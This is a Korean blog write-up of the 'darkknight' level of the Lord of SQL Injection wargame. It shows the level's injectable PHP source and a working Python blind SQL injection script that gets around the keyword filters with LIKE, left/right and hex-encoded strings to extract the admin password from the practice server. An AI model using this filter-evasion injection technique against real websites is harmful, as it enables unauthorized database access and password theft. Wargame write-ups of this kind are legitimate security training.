ABOUT ME

    -

    Today
    -
    Yesterday
    -
    Total
    -
    • LOS darkknight
      WebHacking/Load Of Sql Injection 2018. 2. 15. 04:10
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      <?php 
        include "./config.php"
        login_chk(); 
        dbconnect(); 
        if(preg_match('/prob|_|\.|\(\)/i'$_GET[no])) exit("No Hack ~_~"); 
        if(preg_match('/\'/i'$_GET[pw])) exit("HeHe"); 
        if(preg_match('/\'|substr|ascii|=/i'$_GET[no])) exit("HeHe"); 
        $query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"
        echo "<hr>query : <strong>{$query}</strong><hr><br>"
        $result = @mysql_fetch_array(mysql_query($query)); 
        if($result['id']) echo "<h2>Hello {$result[id]}</h2>"
         
        $_GET[pw] = addslashes($_GET[pw]); 
        $query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'"
        $result = @mysql_fetch_array(mysql_query($query)); 
        if(($result['pw']) && ($result['pw'== $_GET['pw'])) solve("darkknight"); 
        highlight_file(__FILE__); 
      ?>
      		cs


      이번 문제도 쿼리를 두번 실행시키는것을보니 블라인드 sql 문제인것같다..

      substr함수가 막혀있다. 

      대표적으로 left,right,mid,instr함수들을 이용하여서 블라인드 sql injection을 할수있다.

      =도 막혀있기때문에 like를 사용하였다.

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      import urllib2
       
      idx = 8
      num = 0x21
      passwd = ''
      while (True): #length(pw) like 8 = True
          url = 'https://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php'
          url += '?no=0 or id like 0x61646d696e and left(right(pw,%d),1) like 0x%x' %(idx,num)
          req = urllib2.Request(url)
          req.add_header('User-Agent','Mozilla/5.0')
          req.add_header('cookie','PHPSESSID=p1fad2hverso8kg1fs3fndoof6')
      #print url
          data = urllib2.urlopen(req).read()
       
          if 'Hello admin' in data:
              idx -= 1
              passwd += chr(num)
              print num
              if len(passwd)==8:
                  break
              num = 0x21
          else:
              num +=0x1
              if chr(num) == '%':
                  num += 0x1
       
      print passwd
       
      		cs


      저작자표시

      'WebHacking > Load Of Sql Injection' 카테고리의 다른 글

      LOS giant  (0) 2018.02.15
      LOS bugbear  (0) 2018.02.15
      LOS golem  (0) 2018.02.13
      LOS skeleton  (0) 2018.02.13
      LOS vampire  (0) 2018.02.13

      관련글 관련글 더보기

    Designed by Tistory.

    티스토리툴바